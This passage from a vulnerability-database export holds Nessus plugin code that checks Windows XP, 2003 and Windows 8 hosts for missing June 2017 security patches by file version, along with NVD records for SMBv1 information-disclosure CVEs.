script_xref(name:\"MSKB\", value:\"3197835\");\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4022747\");\n script_xref(name:\"MSKB\", value:\"4024323\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSKB\", value:\"4025218\");\n script_xref(name:\"MSFT\", value:\"MS17-3197835\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4022747\");\n script_xref(name:\"MSFT\", value:\"MS17-4024323\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4025218\");\n script_xref(name:\"EDB-ID\", value:\"41738\");\n script_xref(name:\"EDB-ID\", value:\"41992\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Microsoft Security Advisory 4025685: Guidance for older platforms (XP / 2003) (EXPLODINGCAN)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by one or more of the following vulnerabilities :\n\n - A remote code execution vulnerability exists in how the\n Remote Desktop Protocol (RDP) handles requests if the\n RDP server has Smart Card authentication enabled. An\n authenticated, remote attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with full user privileges. 
(CVE-2017-0176)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A buffer overflow condition exists in the IIS WebDAV\n service due to improper handling of the 'If' header in a\n PROPFIND request. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n cause a denial of service condition or the execution of\n arbitrary code. This vulnerability, also known as\n EXPLODINGCAN, is one of multiple Equation Group\n vulnerabilities and exploits disclosed on 2017/04/14 by\n a group known as the Shadow Brokers. (CVE-2017-7269)\n\n - A remote code execution vulnerability exists in how the\n Remote Desktop Protocol (RDP) handles requests if the\n RDP server has Routing and Remote Access enabled. An\n authenticated, remote attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with full user privileges. (CVE-2017-8461)\n\n - A remote code execution vulnerability exists in Windows\n OLE, specifically in olecnv32.dll, due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted file or email, to execute arbitrary\n code in the context of the current user. 
(CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0780816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft IIS WebDav ScStoragePathFromUrl Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nkbs = make_list(\n '3197835',\n '4018271',\n '4018466',\n '4019204',\n '4022747',\n '4024323',\n '4024402',\n '4025218'\n);\n\nbulletin = 'MS17-06';\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif 
(!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\nif ('XP' >< productname)\n{\n if (\n # Windows XP SP3 (x86)\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"win32k.sys\", version:\"5.1.2600.7258\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"query.dll\", version:\"5.1.2600.7273\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"olecnv32.dll\", version:\"5.1.2600.7285\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"rasmxs.dll\", version:\"5.1.2600.7272\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024323\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"httpext.dll\", version:\"6.0.2600.7150\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7238\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"mshtml.dll\", version:\"8.0.6001.23942\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\", arch:\"x86\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"gpkcsp.dll\", version:\"5.1.2600.7264\", min_version:\"5.1.2600.5000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\", arch:\"x86\") ||\n\n # Windows XP SP2 (x64)\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"win32k.sys\", version:\"5.2.3790.6080\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"query.dll\", version:\"5.2.3790.6100\", 
min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"olecnv32.dll\", version:\"5.2.3790.6113\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"rasmxs.dll\", version:\"5.2.3790.6099\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024323\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"httpext.dll\", version:\"6.0.3790.5955\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6051\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"mshtml.dll\", version:\"8.0.6001.23942\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\", arch:\"x64\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"gpkcsp.dll\", version:\"5.2.3790.6093\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\", arch:\"x64\")\n ) vuln = TRUE;\n}\nelse if ('2003' >< productname)\n{\n if (\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"win32k.sys\", version:\"5.2.3790.6080\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"query.dll\", version:\"5.2.3790.6100\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"olecnv32.dll\", version:\"5.2.3790.6113\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025218\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"rasmxs.dll\", version:\"5.2.3790.6099\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", 
bulletin:bulletin, kb:\"4024323\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"httpext.dll\", version:\"6.0.3790.5955\", min_version:\"6.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:\"3197835\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6051\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4018466\") ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"gpkcsp.dll\", version:\"5.2.3790.6093\", min_version:\"5.2.3790.3000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022747\")\n ) vuln = TRUE;\n}\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T16:26:45", "description": "The remote Windows 8 host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. 
An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in Windows OLE due to improper validation of user-supplied input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted file or email message, to execute arbitrary code in the context of the current user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Windows 8 June 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0222", "CVE-2017-0267", "CVE-2017-8464", "CVE-2017-8487", "CVE-2017-8543"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_WINDOWS8.NASL", "href": "https://www.tenable.com/plugins/nessus/100788", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100788);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-8464\",\n \"CVE-2017-8487\",\n \"CVE-2017-8543\"\n );\n script_bugtraq_id(\n 98127,\n 98259,\n 98818,\n 98824,\n 99013\n );\n script_xref(name:\"MSKB\", value:\"4022839\");\n script_xref(name:\"MSKB\", value:\"4019623\");\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSFT\", 
value:\"MS17-4022839\");\n script_xref(name:\"MSFT\", value:\"MS17-4019623\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Windows 8 June 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 8 host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8464)\n\n - A remote code execution vulnerability exists in Windows\n OLE due to improper validation of user-supplied input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website or\n to open a specially crafted file or email message, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4012598/title\");\n # https://support.microsoft.com/en-us/help/4012583/ms17-011-and-ms17-013-description-of-the-security-update-for-microsoft\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba79a274\");\n # https://support.microsoft.com/en-ca/help/4022839/description-of-the-security-update-for-windows-8-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d15161da\");\n # http://www.catalog.update.microsoft.com/Search.aspx?q=KB4019623\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00067ec3\");\n # https://support.microsoft.com/en-us/help/4018271/cumulative-security-update-for-internet-explorer-may-9-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5470f743\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released emergency patches for Windows 8. 
Apply security\nupdates KB4022839, KB4019623, and KB4018271\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-06';\nkbs = make_list(\n \"4022839\",\n \"4019623\",\n \"4018271\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Server\" >< productname)\n audit(AUDIT_OS_NOT, \"Windows 8\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 4022839\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"shell32.dll\", version:\"6.2.9200.22164\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022839\")\n ||\n # 4019623\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019623\")\n ||\n # 4018271\n # x86\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"hlink.dll\", version:\"6.0.6002.22092\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\")\n ||\n # x64\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"hlink.dll\", version:\"6.0.6002.22104\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\")\n\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:51:25", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0267", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", 
"cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0267", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0267", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:27", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0268", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0268", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0268", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", 
